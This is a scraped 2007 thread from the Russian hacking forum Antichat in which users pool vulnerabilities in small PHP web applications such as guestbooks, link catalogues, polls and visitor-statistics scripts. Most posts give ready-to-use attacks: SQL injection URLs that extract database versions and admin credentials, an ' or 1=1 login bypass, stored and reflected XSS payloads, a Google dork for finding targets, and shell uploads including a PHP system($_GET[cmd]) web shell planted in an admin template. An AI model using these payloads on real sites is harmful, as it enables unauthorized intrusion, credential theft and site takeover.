Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

29.05.2007, 22:28
|
|
Постоянный
Регистрация: 06.12.2006
Сообщений: 321
Провел на форуме: 1536533
Репутация:
370
|
|
В своё время начал собирать уязвимости для себя. В общем, кому надо забирайте - _http://slil.ru/24435960.
|
|
|

02.06.2007, 23:41
|
|
Познавший АНТИЧАТ
Регистрация: 02.06.2006
Сообщений: 1,188
Провел на форуме: 6023777
Репутация:
2642
|
|
siteframe SQL inj
http://site/user.php?id=-1+union+select+1,2,3,4,concat(VERSION(),0x3a,DATAB ASE(),0x3a,USER())/*
Скромно, но полезно 
|
|
|

04.06.2007, 21:20
|
|
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме: 17668503
Репутация:
5826
|
|
WR-Guest 1.0
Активная XSS:
При добавление сообщения в поле Имя вписываем скрипт, скрипт будет выполняться при просмотре соообщений.
Последний раз редактировалось Grey; 05.06.2007 в 12:01..
|
|
|

06.06.2007, 16:22
|
|
Познающий
Регистрация: 27.03.2006
Сообщений: 86
Провел на форуме: 972602
Репутация:
52
|
|
SimPoll v.1.0
Активная XSS:
админка управления опросами обычно открыта (файл test_poll_admin.php) в помощью админки можно изменить текущий опрос. при введении текста опроса данные не фильтруются. возможна вставка своего ява-скрипта
google dork: inurl:test_poll_results.php
|
|
|

07.06.2007, 17:40
|
|
Познающий
Регистрация: 06.06.2007
Сообщений: 99
Провел на форуме: 559723
Репутация:
94
|
|
cartkeeper
SQL-inj
hxxp://ckgold.cartkeeper.com/item.php?item_id=-1&category_id=27+group+by+tbl_item.item_id+union+s elect+1,version(),3,user()/*
|
|
|

09.06.2007, 22:40
|
|
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме: 17668503
Репутация:
5826
|
|
Скрипты статистики посещений:
1. Сервер статистики ГелиоСтат
Активная XSS:
В переменной $HTTP_REFERER значения не фильтруются, вписанный в реферер, скрипт будет выполнятся при просмотре статистики.
2. pronuserinfoSQL v1.2
Активная XSS:
В переменной $HTTP_REFERER значения не фильтруются, вписанный в реферер, скрипт будет выполнятся при просмотре статистики.
SQL инъекция:
На странице view.php в поле "отследить последних..." вводим:
' union select 1,2,3,4,5,6/*
3. SEbotInfo 2.0
Активная XSS:
На странице в sebot.php переменные:
HTTP_USER_AGENT вписываем Yandex.
HTTP_HOST вписываем тело скрипта.
Скрипт будет выполняться при просмотре статистики на странице sebotinfo.php.
4. BotsInfo v0.03
Активная XSS:
На странице в write.php переменные:
HTTP_USER_AGENT вписываем Yandex.
HTTP_HOST вписываем тело скрипта.
Скрипт будет выполняться при просмотре статистики на странице botsinfo.php.
Последний раз редактировалось Grey; 12.06.2007 в 16:08..
|
|
|

15.06.2007, 14:18
|
|
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме: 17668503
Репутация:
5826
|
|
EJ3 TOP 1.4
Заливка шелла:
При добавление ссылки на сайт в поле Banner URL вводим:
'; ?> <?php Код шелла ?> <?php $a='
После ввода данных получаем ID:
К примеру: 1181902021
Шелл будет доступен по адресу:
http://site.ru/data/1181902021info.php
http://site.ru/data/[id]info.php
-----------------------------------------------------------
Ссылки и каталоги ссылок
1. Link Database
SQL инъекция:
http://site.ru/links.php?category=-1+union+select+1,2,3,4,5,6/*
2. Link Up
SQL инъекция:
http://site.ru/category.php?category=-1+union+select+1,2/*
Доступ в админку:
http://site.ru/admin/index.php
В поле Username вводим:
' or 1=1 /*
3. SM(links) v2.0
Отсутствие .htaccess:
Смотрим файл config.inc - в нём хранятся логин и пароль к админке:
http://site.ru/config.inc
4. xLink v2.1
Пассивная XSS:
http://site.ru/poisk.php?poisk='><script>alert();</script>
5. My Link 1.00
Активная XSS:
При добавление ссылки в поле Имя ссылки или Описание ссылки вводим скприпт, скрипт будет выполняться при просмотре ссылок.
6. Quick Link
Активная XSS:
При добавление категории (Add Category) вводим скрипт, скрипт будет выполняться при просмотре ссылок.
Последний раз редактировалось Grey; 18.06.2007 в 13:15..
|
|
|

20.06.2007, 16:54
|
|
Участник форума
Регистрация: 06.10.2006
Сообщений: 226
Провел на форуме: 3025546
Репутация:
1327
|
|
scozbook 1.1
Код:
http://site.ru/admin/edit.php?id=-2'+union+select+1,convert(concat(adminname,char(58),adminpass,char(58),adminemail)+using+cp1251),3,4,5,6,7,8,9,10+from+scozbook_admin+limit+0,1/*
|
|
|

26.06.2007, 19:52
|
|
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме: 17668503
Репутация:
5826
|
|
Гостевые книги:
FastStarter
Активная XSS:
Вписываем скрипт в поле name.
Mandralivre 4.1
Активные XSS:
Вписываем скрипт в поля Votre nom, Votre email, Votre site web.
hwdeGUEST 2.0
Активная XSS:
Вписываем скрипт в поле Name.
|
|
|

28.06.2007, 02:27
|
|
Участник форума
Регистрация: 06.10.2006
Сообщений: 226
Провел на форуме: 3025546
Репутация:
1327
|
|
Закрытая гостевая книга v 1.0 (websmith)
вход в админку без пароля
Код:
www.site.ru/admin/index.php
гостевуха стоит 20 баксов, а в демке нехватаит возможности изменения данных. Вполне возможно что в полной версии можно встретить XSS
_________________
guest v1.1
если криво настроены права то можно прочитать файл с логином и паролем
Код:
www.site.ru/passwd.dat
все это дело выглядит след образом
PHP код:
<?php
$Password['admin'] = "d8578edf8458ce06fbc5bb76a58c5ca4";
?>
логин - admin
пароль(мд5) - d8578edf8458ce06fbc5bb76a58c5ca4
заливка шелла выполняеться из админ панели
Код:
http://site.ru/admin.php?design
в поле файла header.inc.php вписываем
PHP код:
<?php system($_GET[cmd]); ?>
и выполняем
Код:
http://site.ru/design/header.inc.php?cmd=команда
Последний раз редактировалось _Pantera_; 28.06.2007 в 02:31..
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|